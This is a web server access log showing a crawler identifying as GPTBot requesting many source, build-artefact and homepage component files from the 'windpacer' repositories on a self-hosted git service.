"/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21679] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fdist%2fPostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 19806] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" -[17/Feb/2026:15:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fGoldMonitor.pkg" [Client 74.7.227.38] [Length 20824] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:15:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 31393] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:15:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 10940] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:15:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10880] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" -[17/Feb/2026:15:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14211] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" -[17/Feb/2026:15:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" -[17/Feb/2026:15:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15563] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" -[17/Feb/2026:15:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14668] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" -[17/Feb/2026:15:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13913] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" -[17/Feb/2026:15:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14827] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" -[17/Feb/2026:15:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" -[17/Feb/2026:15:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" -[17/Feb/2026:15:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" -[17/Feb/2026:15:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" -[17/Feb/2026:15:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 14350] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" -[17/Feb/2026:15:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 18213] [Gzip 14.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" -[17/Feb/2026:15:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" -[17/Feb/2026:15:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14831] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" -[17/Feb/2026:15:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" -[17/Feb/2026:15:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15528] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" -[17/Feb/2026:15:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" -[17/Feb/2026:15:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" -[17/Feb/2026:15:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" -[17/Feb/2026:15:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15560] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" -[17/Feb/2026:15:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14668] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" -[17/Feb/2026:15:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" -[17/Feb/2026:15:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" -[17/Feb/2026:15:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14666] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" -[17/Feb/2026:15:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" -[17/Feb/2026:15:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" -[17/Feb/2026:15:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14211] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" -[17/Feb/2026:15:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14182] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" -[17/Feb/2026:15:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" -[17/Feb/2026:15:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" -[17/Feb/2026:15:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" -[17/Feb/2026:15:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16485] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" -[17/Feb/2026:15:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14799] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" -[17/Feb/2026:15:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" -[17/Feb/2026:15:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14827] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" -[17/Feb/2026:15:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13941] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" -[17/Feb/2026:15:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15558] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" -[17/Feb/2026:15:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16485] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" -[17/Feb/2026:15:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" -[17/Feb/2026:15:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15560] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 